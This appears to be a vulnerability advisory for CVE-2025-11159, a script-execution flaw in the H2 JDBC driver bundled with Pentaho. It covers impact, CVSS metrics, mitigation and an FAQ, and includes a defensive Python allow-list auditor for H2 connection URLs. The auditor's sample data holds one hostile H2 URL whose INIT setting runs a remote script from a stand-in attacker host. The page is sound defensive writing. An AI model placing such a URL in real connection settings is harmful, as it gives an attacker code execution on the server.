
CVE-2025-11159: External Script Execution in H2 JDBC Driver

Platform

java

Component

h2database

Fixed in

11.0

CVE-2025-11159 describes a critical external script execution vulnerability in the H2 Database JDBC Driver as shipped with Hitachi Vantara Pentaho Data Integration & Analytics. When a data source administrator establishes a new connection through the vulnerable driver, a crafted connection definition causes the driver to execute arbitrary code on the Pentaho server. All Pentaho Data Integration & Analytics releases that bundle the vulnerable driver are affected; the version range given on this page (1.0.0 through 11.0) refers to Pentaho releases, not to H2's own version numbering. A fix is available in version 11.0 (the remediation section also names 10.2.0.7 for the 10.2 line).


Impact and attack scenarios

Successful exploitation of CVE-2025-11159 gives the attacker code execution in the context of the Pentaho Data Integration & Analytics application, and from there control over the host. The CVSS vector rates Privileges Required as High: the attacker must already hold, or have compromised, a data source administrator account, and the attack consists of saving a connection definition whose H2 JDBC URL makes the driver run code when the connection is first opened. Once on the Pentaho server the attacker can read and exfiltrate data, tamper with data, cause denial of service, install persistent backdoors, and move laterally to the databases and network segments Pentaho is allowed to reach. The impact is aggravated because the trigger is connection creation, a routine and usually trusted administrative operation, and because the scope is Changed: the code runs with the application's privileges on the host rather than inside the database. The issue belongs to the same class as other JDBC URL injection vulnerabilities, in which driver-specific URL parameters cause the driver itself to execute SQL or load code before any query is sent.

Exploitation context

CVE-2025-11159 is not listed in the CISA KEV (Known Exploited Vulnerabilities) catalog. The EPSS (Exploit Prediction Scoring System) score is pending evaluation. No public proof-of-concept (PoC) exploit had been disclosed as of the publication date. The NVD (National Vulnerability Database) record for this CVE is dated 2026-05-13, so the vulnerability is newly disclosed and still being assessed for exploitation potential.

Threat information

Exploit status

Proof of concept: unknown
CISA KEV: no
Internet exposure: high

CISA SSVC

Exploitation: none
Automatable: no
Technical impact: total

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Base score 9.1 (Critical), CVSS v3.1 (source: nextguardhq.com)

What do these metrics mean?
Attack Vector: Network. Exploitable remotely over the network; no physical or local access is required.
Attack Complexity: Low. No special conditions are required; the flaw is reliably exploitable.
Privileges Required: High. An administrator or otherwise privileged account is required (here, a data source administrator).
User Interaction: None. No action by a victim is needed; the attack is automatic and silent.
Scope: Changed. The impact extends beyond the vulnerable component (the JDBC driver) to the application and host that loaded it.
Confidentiality: High. Full loss of confidentiality; the attacker can read all data.
Integrity: High. The attacker can write, modify or delete all data.
Availability: High. Complete crash or resource exhaustion; total denial of service.

Affected software

Component: h2database (as bundled with Pentaho Data Integration & Analytics)
Vendor: Hitachi Vantara
Minimum version: 1.0.0
Maximum version: 11.0
Fixed in: 11.0
Note: the version numbers are Pentaho release numbers, not H2 driver versions.

Weakness classification (CWE)

Timeline

  1. Reserved
  2. Published

Mitigation and workarounds

The primary mitigation for CVE-2025-11159 is to upgrade Pentaho Data Integration & Analytics to a release that ships the patched H2 Database JDBC Driver (11.0 or later; the remediation section also names 10.2.0.7 for the 10.2 line). If an immediate upgrade is not possible, limit the data source administrator role to the few trusted users who need it and treat its credentials as high-value. Validate connection parameters with an allow-list rather than a denylist: accept only the H2 URL settings a data source genuinely needs and reject everything else, because any H2 URL option that makes the driver execute SQL or contact a remote host is a code execution path. A WAF does not see JDBC traffic itself, but one placed in front of the Pentaho web interface can inspect the HTTP requests that create or edit a data source and block suspicious URL parameters; treat this as a partial control only. Monitor Pentaho logs for data source creation by unexpected accounts, connection attempts to unfamiliar hosts, and driver errors at connection time that may indicate exploitation attempts. After upgrading, confirm the fix in a test environment by creating a data source whose H2 URL carries a script-executing option; the patched version should reject it.
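The advisory gives no parameter-level detail, so the check below is an added example for the allow-list validation recommended above and for the URL-parameter attack class described under impact; it is not Pentaho or H2 project code, and its policy is an assumption. It relies on two documented H2 facts: the URL form jdbc:h2:<target>;KEY=VALUE;... and the INIT setting, which makes the driver run SQL statements (such as RUNSCRIPT FROM a file or URL) as soon as it connects. The audit rejects INIT outright, refuses remote tcp:// and ssl:// targets, and accepts only an assumed short list of harmless settings. The data source definitions it scans are constructed samples (hosts use the reserved .invalid domain); which settings Pentaho's fix actually blocks is not stated on this page.

```python
"""Audit H2 JDBC URLs before a data source definition is saved.

Added example: not Pentaho or H2 project code. The URL grammar and the INIT
setting are documented H2 behaviour; the allow-list and verdicts are this
example's assumed policy.
"""
import re
from typing import NamedTuple

H2_PREFIX = "jdbc:h2:"

# Targets that make the driver open a network connection to another host
# (assumed policy: never from an admin-supplied URL).
REMOTE_MODES = ("tcp://", "ssl://")

# INIT is a documented H2 URL setting: the driver executes its SQL right after
# connecting, including RUNSCRIPT FROM '<file or URL>'. Never accept it from a
# user-supplied URL (assumed policy).
SCRIPT_SETTINGS = {"INIT"}

# Settings a data source administrator may legitimately need (assumed
# allow-list; extend deliberately, one setting at a time).
ALLOWED_SETTINGS = {"MODE", "DB_CLOSE_DELAY", "IFEXISTS", "AUTO_SERVER"}


class Verdict(NamedTuple):
    allowed: bool
    findings: list[str]


def split_settings(rest: str) -> tuple[str, dict[str, str]]:
    """Split '<target>;KEY=VALUE;KEY=VALUE' into the target and its settings.

    H2 escapes a literal semicolon inside a value as '\\;', so only unescaped
    semicolons separate settings. Keys are upper-cased, as the driver itself
    treats them case-insensitively, so 'init=' cannot slip past the check.
    """
    parts = re.split(r"(?<!\\);", rest)
    settings: dict[str, str] = {}
    for raw in parts[1:]:
        if not raw.strip():
            continue
        key, _, value = raw.partition("=")
        settings[key.strip().upper()] = value.replace("\\;", ";").strip()
    return parts[0].strip(), settings


def audit_h2_url(url: str) -> Verdict:
    """Return whether the URL is acceptable and every reason it is not."""
    findings: list[str] = []
    if not url.lower().startswith(H2_PREFIX):
        return Verdict(False, [f"not an H2 JDBC URL: {url!r}"])
    target, settings = split_settings(url[len(H2_PREFIX):])
    if not target:
        findings.append("empty database target")
    elif target.lower().startswith(REMOTE_MODES):
        findings.append(f"remote H2 mode is not allowed: {target!r}")
    for key, value in settings.items():
        if key in SCRIPT_SETTINGS:
            findings.append(f"script-executing setting {key}={value!r}")
        elif key not in ALLOWED_SETTINGS:
            findings.append(f"setting {key} is not on the allow-list")
    return Verdict(not findings, findings)


# Constructed sample data source definitions (hosts use the reserved .invalid TLD).
SAMPLE_DATASOURCES = {
    "reporting_cache": "jdbc:h2:mem:reporting;MODE=PostgreSQL;DB_CLOSE_DELAY=-1",
    "staging_file": "jdbc:h2:file:/var/lib/pentaho/staging;IFEXISTS=TRUE",
    "suspicious_init": "jdbc:h2:mem:x;init=RUNSCRIPT FROM 'http://attacker.invalid/s.sql'",
    "remote_server": "jdbc:h2:tcp://db.invalid:9092/app;MODE=MySQL",
    "wrong_driver": "jdbc:postgresql://db.invalid/app",
}


def audit_all(datasources: dict[str, str]) -> dict[str, Verdict]:
    """Audit every named data source URL and keep the verdicts by name."""
    return {name: audit_h2_url(url) for name, url in datasources.items()}


if __name__ == "__main__":
    for name, verdict in audit_all(SAMPLE_DATASOURCES).items():
        status = "ALLOW" if verdict.allowed else "REJECT"
        print(f"{status:6} {name}")
        for finding in verdict.findings:
            print(f"       - {finding}")
```

Run it over the data source definitions exported from a Pentaho instance, or put the same logic in front of the data source creation form. The design point is that the allow-list decides: a denylist of known-bad strings would have to anticipate every H2 option that executes SQL or opens a socket, while the allow-list only has to name the few options an administrator actually needs.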

How to remediate

Update to a Pentaho release that ships the patched H2 JDBC driver: 10.2.0.7 or later on the 10.2 line, or 11.0 or later, to mitigate the external script execution vulnerability. Review the data source configuration to ensure that only authorised users can create new connections. Consult the Hitachi Vantara Pentaho documentation for release-specific upgrade instructions.

Frequently asked questions

What is CVE-2025-11159 — External Script Execution in H2 JDBC Driver?

CVE-2025-11159 is a critical vulnerability in the H2 Database JDBC Driver bundled with Hitachi Vantara Pentaho Data Integration & Analytics versions 1.0.0 through 11.0 (fixed in 11.0). It allows an attacker who can create a data source connection to execute arbitrary code on the Pentaho server through a crafted H2 JDBC connection definition.

Am I affected by CVE-2025-11159 in H2 JDBC Driver?

You are affected if you run Hitachi Vantara Pentaho Data Integration & Analytics in a release from 1.0.0 up to the fix in 11.0 (10.2.0.7 on the 10.2 line) and it bundles the vulnerable H2 Database JDBC Driver. Check your Pentaho release and the H2 driver jar shipped with it to determine your exposure.

How do I fix CVE-2025-11159 in H2 JDBC Driver?

Upgrade Pentaho Data Integration & Analytics to a release that includes the patched H2 Database JDBC Driver (version 11.0 or later). As an interim measure, restrict the data source administrator role and allow-list the connection parameters it may set.

Is CVE-2025-11159 being actively exploited?

As of the publication date, no public proof-of-concept (PoC) exploit had been disclosed and the CVE is not in the CISA KEV catalog. Given the criticality and the low attack complexity once administrator credentials are in hand, treat active exploitation as plausible and monitor for it.

Where can I find the official Hitachi Vantara advisory for CVE-2025-11159?

Refer to the Hitachi Vantara security advisory for CVE-2025-11159, which can be found on the Hitachi Vantara support website. Search for 'CVE-2025-11159 Hitachi Vantara' to locate the relevant advisory.
